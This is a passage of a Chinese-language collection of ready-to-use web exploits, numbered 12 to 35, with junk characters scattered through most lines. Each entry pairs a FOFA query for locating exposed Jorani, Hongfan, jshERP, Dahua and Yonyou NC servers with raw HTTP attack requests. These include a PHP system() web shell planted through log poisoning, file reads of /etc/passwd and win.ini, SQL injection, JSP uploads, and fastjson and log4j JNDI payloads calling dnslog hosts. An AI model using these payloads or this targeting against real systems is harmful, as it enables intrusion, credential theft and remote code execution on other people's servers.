+ K- w7 n/ ~0 WUpgrade-Insecure-Requests: 1" @, S3 Z9 Q& T) C! u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 V, w5 b( d' O- D! KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 ]$ f$ k) j2 C' Z
Accept-Encoding: gzip, deflate
: [: `* W9 {- g1 S2 y. \- yAccept-Language: zh-CN,zh;q=0.9,en;q=0.81 |0 D: l5 G, a! k$ U% g0 }: |) O
Connection: close
" J5 |5 q; y; A* d2 t# U8 W9 Z: x2 _; V/ g9 m M% h+ W
5 p" U3 w" v3 c R
12. Jorani < 1.0.2 远程命令执行
' B2 h+ Y) G( C# }( L3 a8 _FOFA:title="Jorani"
% r/ L$ \+ D$ Q$ `- g5 O+ b9 {第一步先拿到cookie
/ O7 }: O5 A* k$ PGET /session/login HTTP/1.1
9 _. s1 t$ N. i, G# T! {+ u( u7 zHost: 192.168.190.30# N, ?) U; L- R! @, `' e( C$ x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
6 y6 U2 D* g# N0 U; d- ^Connection: close5 c( M/ u1 C: b5 A3 C8 }- J+ s
Accept-Encoding: gzip
8 @+ u, ^6 r. k' _+ K7 k# B: H4 p1 u0 |0 G, |
% B; I# u6 {+ H2 }响应中csrf_cookie_jorani用于后续请求
) R9 N, ^; W8 C# x0 x6 RHTTP/1.1 200 OK
; v p# p O7 v- x* QConnection: close
9 B# y9 h- D# P# ]* |$ NCache-Control: no-store, no-cache, must-revalidate: }3 V5 o+ ?/ o9 o: i2 s2 Y' H
Content-Type: text/html; charset=UTF-8# m |2 V9 l4 y
Date: Tue, 24 Oct 2023 09:34:28 GMT
: C( M7 _% v" W. [7 n" LExpires: Thu, 19 Nov 1981 08:52:00 GMT
$ c5 u$ b) U* u, m; V" LLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
8 F! M ?* D) B3 L9 NPragma: no-cache2 h" L* r+ y+ ]9 w# ~& Q; I0 t
Server: Apache/2.4.54 (Debian); |* M9 V* X8 r7 L1 |
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
3 b$ e0 U$ Z* I5 GSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
0 N8 R4 V x6 _. V6 w& {/ YVary: Accept-Encoding: H# W$ F! |( c" N1 B5 T
/ p- p+ j& G+ t# j$ G
! h7 u% R3 L: w" u& `6 W4 y) d0 APOST请求,执行函数并进行base64编码4 S/ x: b# z' a3 |9 `! k, e
POST /session/login HTTP/1.1
' j' s# m$ G1 H7 J- OHost: 192.168.190.30
. @0 N1 f# A: P( F# X) LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
; I3 Q' R3 z) {& I4 {( W$ z" YConnection: close
3 M4 a0 ?0 P4 o* ]9 pContent-Length: 252
b+ i; x8 @! R |/ J: O, bContent-Type: application/x-www-form-urlencoded& C& E. R% I, c9 O/ `! y
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
2 c6 B- |. \5 wAccept-Encoding: gzip
: z% E) W% T3 h9 U8 O6 _' O# h3 v( B
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor1 @& G0 P' e- g+ K4 Y
1 k. g6 t2 ^9 R: u2 d' D
T7 _& E$ B( E# B
6 c; ?( m6 _5 M" r
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
( [7 G% L/ x) j4 L+ Y3 r! s1 K7 UGET /pages/view/log-2023-10-24 HTTP/1.1" D1 D c n ]) |% k+ a8 n. T2 `
Host: 192.168.190.306 N) p" X& M% ?) r# J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36% ?, g ^5 j. Z! I# M; @
Connection: close
( K9 Q# Y( V6 Y9 C: E: b& e$ mCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r: A" V; j1 {: g) K: @4 ?
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
; y2 Q3 w& Z* t( I3 NX-REQUESTED-WITH: XMLHttpRequest
3 ^/ K" [4 t8 `% `) xAccept-Encoding: gzip$ j% i; u9 _" G5 E' h
6 a) u* ]4 C& {/ x
2 e+ V. N" T4 j& E2 f: Y4 ^13. 红帆iOffice ioFileDown任意文件读取* V- O# X! a! k, H
FOFA:app="红帆-ioffice". t9 K0 C' v0 C+ T% Q0 i1 [
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.11 p! {4 K, |! I. o+ B7 V. o
Host: x.x.x.x
) Y' {! A. ^1 M- i. Q e( Q5 w- e% _User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36, J C! d {/ N' N W t3 e
Connection: close1 k: Y7 _3 E/ O
Accept: */*! d2 Z. J r# L* `' Z& t) z
Accept-Encoding: gzip9 w) c' G( [+ M! }; n$ A
3 s2 n2 A; i8 S1 }
* [4 ]' e3 Z8 N, Q/ ^0 _8 r& d' f14. 华夏ERP(jshERP)敏感信息泄露
4 p; d; i6 ^' u7 a, y% mFOFA:body="jshERP-boot"
* t0 [* o3 w. m$ H* Z$ O* |/ z泄露内容包括用户名密码
5 k) _" N f! WGET /jshERP-boot/user/getAllList;.ico HTTP/1.1& H. A' h; |. U. z- I, ~
Host: x.x.x.x9 g2 r( ]8 D' j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.365 c6 D1 I& ]8 I- ]$ d
Connection: close7 U p B( T* L' h8 B
Accept: */*; W; ^* c# K' V5 C& u8 r
Accept-Language: en
' k" Z+ f6 F; N- y; x# k$ i+ l2 sAccept-Encoding: gzip2 D' i7 v! B. n% x
$ F% O5 ]+ I! ~5 X
0 L- k& M! y( }' Q4 h9 W15. 华夏ERP getAllList信息泄露" ]) [. v" V @( a
CVE-2024-0490
! @: O# M3 |; w6 m; |/ d. TFOFA:body="jshERP-boot"
4 K, E b( k9 ?/ ^泄露内容包括用户名密码
, k0 |; w5 ~0 ZGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
! v: C( x* h6 v6 B+ B3 oHost: 192.168.40.130:1005 N! N* F& h$ x. a: o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.361 |; s6 h' C$ E: F, x
Connection: close: Y. E' s/ @7 L' v
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
* H1 B5 F3 o: g$ L# r* O, HAccept-Language: en7 w5 k2 a9 m/ }$ p/ L& Z2 D
sec-ch-ua-platform: Windows6 r9 b, W( g/ m
Accept-Encoding: gzip! u! c& H% ^. R9 m5 Q1 s
, s0 a/ p0 @% E% y; a( C7 F5 g* Y0 w7 N% Y% K5 K
16. 红帆HFOffice医微云SQL注入
, j+ A$ \' x+ B6 PFOFA:title="HFOffice"1 P, H* ?9 E# j5 w2 h0 r
poc中调用函数计算1234的md5值
/ |1 Z4 I# t" W. r9 Z( P1 g% ZGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1: A& X5 g' w& W3 ~
Host: x.x.x.x
5 F- _& |$ x _. LUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.365 H& W# D4 ]4 n3 x2 H; T
Connection: close
8 @+ B& \7 \" ~7 ^Accept: */*( H$ b% j; C/ ~6 Z0 {
Accept-Language: en
6 g1 A# `; z9 Q8 P; j7 {& CAccept-Encoding: gzip
( a$ S. F8 B! F( ^( A2 C% G
M- T8 F* d0 I) O1 e# T' B7 {9 Z8 I: L6 K3 B: h* j
17. 大华 DSS itcBulletin SQL 注入' Z' U' ]5 Q! c( M3 H
FOFA:app="dahua-DSS"; I! S' [: e& x
POST /portal/services/itcBulletin?wsdl HTTP/1.1- ]4 g+ F1 `& [5 w- c& Z- f
Host: x.x.x.x+ U1 P2 b/ K4 a0 I$ C& Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* w8 f4 R) j1 x1 X' rConnection: close- H/ o3 M' W% A- V
Content-Length: 345
# w, M* X, W, f" B2 qAccept-Encoding: gzip
: f5 V$ J. F4 M2 r. J- }; G' c8 _, |6 K0 C
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
( s; U, C: w, J% M$ L<s11:Body>
. Y* H) P: ?& ]4 f* M' O( i9 q/ i <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>5 Z* Q, u4 l! k2 ], ?% N
<netMarkings>
/ [. `. I; M U. ~ n/ S b l0 n (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1* a& w# E+ H0 O" T/ G6 M
</netMarkings>) N5 E6 m! l B0 ~$ a4 M
</ns1:deleteBulletin>
* T4 Y# W9 K+ u! a3 P* j </s11:Body>
! S5 X& Y' g& W' U( n</s11:Envelope>
- j+ N5 ~, M; a! h, I0 Z5 u" e6 I8 n
* P- r8 R, y, H4 j8 p, Y18. 大华 DSS 数字监控系统 user_edit.action 信息泄露6 e$ v" z& b1 ^5 Y5 k$ `
FOFA:app="dahua-DSS"
1 n: j2 o5 h- i1 OGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
9 A) W) V+ A9 | d \5 u6 `Host: your-ip4 N, K. A+ U6 |9 X7 r! M4 Z( ^, G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ x" g' S7 d" m+ S# HAccept-Encoding: gzip, deflate
0 v$ b& E3 G+ FAccept: */*
! Y; f% d6 W5 J* XConnection: keep-alive
% O2 k, S3 U' Z9 t) e# n& v! @7 T, N4 ` G4 b2 N
! g4 ~+ A, o! j1 V) H. g. G1 i
! F1 A$ A( |4 _' Y* N& ?19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入6 Z- R& o0 s3 T' d
FOFA:app="dahua-DSS"
/ p8 j& N8 F, i9 rGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
& K& }1 n2 G2 X- V/ a' `1 nHost:+ Z8 x! l# K/ a4 T0 q% [# H
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.361 A. U/ F: i, _' V
Accept-Encoding: gzip, deflate
$ n" T0 y, k3 h2 g6 S2 Z5 @+ ]7 `Accept: */*
" } @3 {( i/ T/ B+ d8 ^# @Connection: keep-alive
) L* _ z1 D- K, c( p5 z; B' k2 C& V0 s6 d) r) M6 y4 W/ g
4 Y8 D. d* x5 U
20. 大华ICC智能物联综合管理平台任意文件读取% s1 K( ^0 J& ?+ |- p- Y( I m
FOFA:body="*客户端会小于800*"6 N" X4 K, t; l' k: d4 n
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
& x/ A7 j, x0 f' f% CHost: x.x.x.x! L) q m% t2 K8 k4 A% B# e5 m
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' m- q' z5 b% d; n7 i, J
Connection: close9 F3 u. m2 ?/ }! m8 z8 V/ O) h
Accept: */*
3 ?( n; G7 s% ?7 H hAccept-Language: en
) N* S8 d* a) a! kAccept-Encoding: gzip+ G1 i1 t5 N+ \; z
1 j4 _" T% s/ C" x
! V- Y; @0 q) ], V" U$ b) l
21. 大华ICC智能物联综合管理平台random远程代码执行
9 t/ z, ^& B. s$ gFOFA:icon_hash="-1935899595"
; L$ |3 N$ H0 y6 e1 R" Z0 nPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
/ L! G4 b" K" d# L0 ~Host: x.x.x.x
5 e! E6 L. U- D" K1 [7 k5 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 ]! x( O" U3 _0 Q$ o
Content-Length: 1613 e9 K$ [6 D0 A9 s6 Z
Accept-Encoding: gzip
, ?- q* G' }3 U1 Z' XConnection: close
" N; j4 @$ P; h* N, l9 mContent-Type: application/json;charset=utf-8
8 O& }2 g* C. N1 ]% A& w" P q
( _0 ~: a* c" N: B{ S. w8 ?' q; c
"a":{
: r# A, h3 e) P4 E8 }/ q9 ] "@type":"com.alibaba.fastjson.JSONObject",3 J C6 Q) i. U$ f+ N% n2 a3 }
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
. I7 @/ Q. z7 ~8 M) J }"". P- j- p6 K5 C ^$ G( ]3 ~6 b, T
}: z% E1 B+ B D" N# w4 ~; `
- K$ K1 |- i3 e* i! B
- e) v" m* s9 p' I22. 大华ICC智能物联综合管理平台 log4j远程代码执行$ b5 t, M, Z, {, U }" u* u
FOFA:icon_hash="-1935899595"8 z! P( i' }! X% K( X0 @
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.18 l, Q8 k) Y7 Z4 l6 ^; r/ c% r
Host: your-ip8 I: ~9 P' o$ ^9 Z" G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ T- [4 s3 h8 hContent-Type: application/json;charset=utf-8# D& w( b h* P$ G
; f7 }$ }9 s& i1 g" Z/ Y2 a/ W{- e) U% r1 |) U8 I) B: M
"loginName":"${jndi:ldap://dnslog}"4 g7 T. G/ ]/ F, a. e# G2 Y
}( l# g" S- b( e& F3 C' F% l
! X& p. q4 E) G
( }$ |. Y8 m: [5 \3 K6 y/ E. p& e8 v
2 U _; U. T' S, j4 I3 h$ G6 z23. 大华ICC智能物联综合管理平台 fastjson远程代码执行) w% e* ~8 V# c1 C& c# W$ n( C
FOFA:icon_hash="-1935899595"" v- r) l' `. [ P6 G
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
) [2 i4 [. y* L& hHost: your-ip
: g: v y7 D* z& K1 D, `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! [/ s. r) }1 [# D; LContent-Type: application/json;charset=utf-8) Z# M4 @0 S$ m: T: [7 H2 I# ^. H
Accept-Encoding: gzip
8 F( D) H& I/ X) E5 x& a& ]1 W9 CConnection: close, q$ e8 b0 [2 n8 J# ^" K9 O4 p
2 {' a9 w! B: _' d/ j$ |/ I' a! r{1 b3 ~! U! j0 J5 u$ ?0 e9 W8 `+ S
"a":{6 t8 j2 D: z; W* R4 C
"@type":"com.alibaba.fastjson.JSONObject",7 P# w5 o8 l$ r
{"@type":"java.net.URL","val":"http://DNSLOG"}
% U% \( B i- a5 O& A( v }""' P& }3 b, @3 ]/ z- l( ?
}% p3 C" L" s8 g v3 B
2 Y4 E3 I+ j: l. S
" S% T- @& ]- ?( w+ ]! Q7 y1 K$ _24. 用友NC 6.5 accept.jsp任意文件上传& P5 I5 B* \3 w! e
FOFA:icon_hash="1085941792"
$ s/ `+ L' |5 P- I- ~* @6 UPOST /aim/equipmap/accept.jsp HTTP/1.1
$ L9 j* J5 N4 k! V. g5 kHost: x.x.x.x6 W5 e2 k& l# p+ O' @
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36: U$ u" l! U/ D4 X# v( m, T1 K/ @4 y+ P+ Z
Connection: close; f9 p; G; } c9 H, ^* S
Content-Length: 449
' J7 S: ^( I l% Q. D7 HAccept: */*
; H$ u& z" V, `6 v' O9 `Accept-Encoding: gzip6 \9 L6 X) c+ ]6 Y3 G) q8 ?1 o' f" i
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
# T6 A7 d* O0 j' k' c! K* ~+ y/ {0 E+ Q7 b! n) ]7 L5 c
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
) p, H* N6 O# ]: s: Y3 K# Z0 k8 K3 RContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt", t# ` v- }( Y# Z( a" P/ ]! S
Content-Type: text/plain
: j3 D: r4 f, A- m( ^9 ]
" V/ e8 L- U0 V. R' m" w<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>. }% D' C7 O$ v0 i
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc+ L) O# l1 M8 T. W) U- L
Content-Disposition: form-data; name="fname"
+ R, j+ `0 Z) t% N! P: [( _7 m8 f' [. r1 T0 E: {$ b$ v# W
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
) Z! o! y9 t& x& }-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
* ^- o' s( H. ?8 v! z5 ?* j2 A8 }" x$ Y" O; M' N4 Y! S
& ]: F) d* K) {5 C5 o25. 用友NC registerServlet JNDI 远程代码执行
# [; C6 k4 O6 y. E2 K' oFOFA:app="用友-UFIDA-NC"
' \5 Y5 ~# H: G3 [POST /portal/registerServlet HTTP/1.15 f/ l3 ? j# t" P: \' k% }
Host: your-ip0 v, Z! R+ B3 S$ v W- h4 I4 d) ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0# z0 w$ e$ y3 {5 z9 p& N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
. }% A' f0 v4 b5 `2 w; IAccept-Encoding: gzip, deflate
% ^4 f! G& u( e2 B* A/ @3 jAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
8 C; I `9 K# ]6 k pContent-Type: application/x-www-form-urlencoded( X3 @ P( J, Y7 v$ L6 @ a
8 D' N% z9 H1 F
type=1&dsname=ldap://dnslog+ Q. ]! ^0 Y6 E/ [0 _: S
# O q1 [8 |- u6 x- k6 Z. m
0 U, E) V/ d( M2 {) k" s
8 c2 g+ \; `/ i26. 用友NC linkVoucher SQL注入; q/ ~* Y( H- r% q* u) j! |
FOFA:app="用友-UFIDA-NC"
3 R1 \ y' G7 P$ H8 z) TGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
8 ` w/ a2 M. W: s" e' \" G2 iHost: your-ip
' r+ N1 g3 x# g( mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; U& x# f7 u2 w6 q- J" w5 v5 K( ~
Content-Type: application/x-www-form-urlencoded# k2 Z+ c7 s" w' s6 P! H# Z+ q
Accept-Encoding: gzip, deflate
# `" X3 P/ x0 j0 U5 r2 |9 F6 ~Accept: */*
! J- x: T O- iConnection: keep-alive
$ J& O: E/ T. l+ Q) W- @/ U1 A. [* V7 X0 a
: c: H& E& n! ]* b' H9 I/ `27. 用友 NC showcontent SQL注入& H7 ?% o- Z7 ]1 \# h( E8 {
FOFA:icon_hash="1085941792"
3 {& O# c/ \: `2 q$ X; U, EGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1+ y. k* j% V( R F9 x# H, s
Host: your-ip
7 a, n( n2 t# x2 s" m4 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 U% c) w2 @ x- G) R: [0 e
Accept-Encoding: identity
/ n& h2 F# f! L/ B& e. |/ J1 \Connection: close
% A/ _% ~2 d! m- x( u% PContent-Type: text/xml; charset=utf-8
! Z* A1 D* R7 J8 V
* f; g- f& E9 F/ z ?9 u; D3 t, O3 F* m
28. 用友NC grouptemplet 任意文件上传
' |9 |0 V, v8 H( o4 cFOFA:icon_hash="1085941792"6 r; u& |6 T; v' j5 C/ r% `
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
" ]1 @& R2 x0 j! IHost: x.x.x.x: h3 p5 s( H3 _6 K: \. o1 V- t8 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36/ D: f3 n! c* q1 K9 g/ d( G6 w
Connection: close
3 I$ y9 O$ A1 P( ^# E( P2 YContent-Length: 268
+ w' D* F4 }$ x3 ^+ @+ dContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk3 ?1 f @1 z T. {
Accept-Encoding: gzip( V. H. {1 c( |
5 @: k" R. B7 r' [+ D5 K8 V------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
! U6 r: ?- Z hContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"* E" a5 F+ _% U$ c" x5 H/ |8 C% i4 y/ s
Content-Type: application/octet-stream! `6 ?5 |/ i. G$ h5 N1 j0 v
2 r8 R" [- [7 K0 j<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>/ d0 t/ @, K+ `0 {
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
" N) y4 A3 j5 P4 s/ r0 [+ M" p8 E4 m. e. Z, q( J
9 `5 [2 v% f0 m: X1 Q
/uapim/static/pages/nc/head.jsp
' m! U% S6 W4 H* u' U, S
. |1 D; ]0 ]5 Z& o$ H) y0 R! n29. 用友NC down/bill SQL注入
; w+ R' {7 ~& S! C }2 Y9 sFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"4 p) o4 h3 H# Z" C2 b; C+ n
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
. O: a1 @* c" Z8 H; g0 j7 OHost: your-ip
" O4 E1 W0 c% }: i$ Y% q3 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 i$ U5 s- P% [$ F5 L/ n! n2 }0 }Content-Type: application/x-www-form-urlencoded
0 P) ?0 y3 o: ~% yAccept-Encoding: gzip, deflate+ ^8 K) e- L( l% @ N3 j
Accept: */*4 N+ m ?$ [4 \, H' o; U7 ]
Connection: keep-alive
% J3 m% l. h4 N/ L Q: o6 C$ U# K: A5 a! X
5 U# y/ f0 `1 T30. 用友NC importPml SQL注入& b/ P% Z6 w6 `; s7 w$ ^' w8 |
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif") U2 m* h' [( y: ]" z
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
* @2 K0 Y5 W# g3 T& a' vHost: your-ip. C2 ? \1 K& ]# O
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
; H4 a2 D5 L% w& |; ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
1 S0 ~$ s2 Y2 U4 ~" ^Connection: close5 C* W" R3 ~# S5 A5 _: B8 S
3 w& A+ k: b5 U6 \
------WebKitFormBoundaryH970hbttBhoCyj9V, o" h: |( @4 n8 g* v9 `
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
4 A, [7 P' v T( UContent-Type: image/jpeg
+ k7 H. q# R: J, w------WebKitFormBoundaryH970hbttBhoCyj9V--
- k, }) ?; ~8 s+ ]
* |! q: |2 ]& E! ]& ^* n/ v
! g" @" D+ Y2 u; w: G. v+ g( Y8 K31. 用友NC runStateServlet SQL注入
' s l. u6 y! v5 X1 oversion<=6.5$ h& k- q1 o" X" P* d4 O+ p+ j7 b
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"* l& e4 j. X; e+ j1 Z `7 Z
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.18 E; X. u5 u! \! w' D* T
Host: host$ `# X5 x: c& r3 Q# s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
- S% u( m; O1 {Content-Type: application/x-www-form-urlencoded
6 i B7 X" k& }( Y6 P# x" {7 c# j: c3 P3 W4 C3 P
8 g, n# F# `: g U( I1 D32. 用友NC complainbilldetail SQL注入
& e0 ~% H8 |) ` eversion= NC633、NC655 H3 I/ _1 S! j. Z
FOFA:app="用友-UFIDA-NC"
^+ e) U: m: g7 O, \' sGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1: F s; P$ G; d# M( E; f6 W
Host: your-ip
3 ], S* d5 m" s RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" ^" z0 |. _2 o5 ]1 O0 m) ~
Content-Type: application/x-www-form-urlencoded
8 A2 d6 ]' ~8 w7 q- _7 e$ lAccept-Encoding: gzip, deflate, x. } M1 S% x6 _' f0 u
Accept: */*% C- x4 W# O- H
Connection: keep-alive
" C, Z# z; ]6 ~. p" a) Q E( {3 H# T; d6 |" W! g
% Y) `# ^. ~2 i% s% Q8 C1 m8 k9 p, A
33. 用友NC downTax/download SQL注入
/ U: y& I7 \0 N6 H* B$ Uversion:NC6.5FOFA:app="用友-UFIDA-NC"! Z2 r0 r: [/ q* y. [
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+ F$ ?( q/ ]9 V: aHost: your-ip- V2 R# q2 M+ F& P' @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% ?1 O' S, D; p1 ^/ w
Content-Type: application/x-www-form-urlencoded* W% e5 R( p( r3 p1 W% L* q7 o
Accept-Encoding: gzip, deflate
/ H, T0 y$ @' D) l* G) VAccept: */*
* n; W. G) T! j* ]8 R! D. ^Connection: keep-alive
0 A) R- k2 J$ }" @4 M7 J. a
# r, P+ ~, k' D6 v6 @% w- B" C; E8 {9 O1 T
34. 用友NC warningDetailInfo接口SQL注入
1 \2 C% a, e/ ?& g) N* kFOFA:app="用友-UFIDA-NC"4 C3 v) U; ~5 W: ~
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
' _. X5 ]8 P/ m" W2 AHost: your-ip
( R' f' V G& A4 J+ W. r$ XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 `9 [! @' ? o- ?& V7 MContent-Type: application/x-www-form-urlencoded% Z$ v# T9 d" j. z$ N8 C
Accept-Encoding: gzip, deflate
# v4 \( ~$ @; B: f% i9 ^" ?Accept: */*$ H3 |& }& }. n! k
Connection: keep-alive* E; c3 ]/ q- ^
# U& @* y4 w% P" w4 ]( t" W( R9 e
35. 用友NC-Cloud importhttpscer任意文件上传
7 ^# f+ @# G, G: y0 C! E7 e4 uFOFA:app="用友-NC-Cloud"
! B% V9 |* P- `# f) p1 u8 O7 CPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.17 \5 y5 ~5 N/ D( T
Host: 203.25.218.166:8888
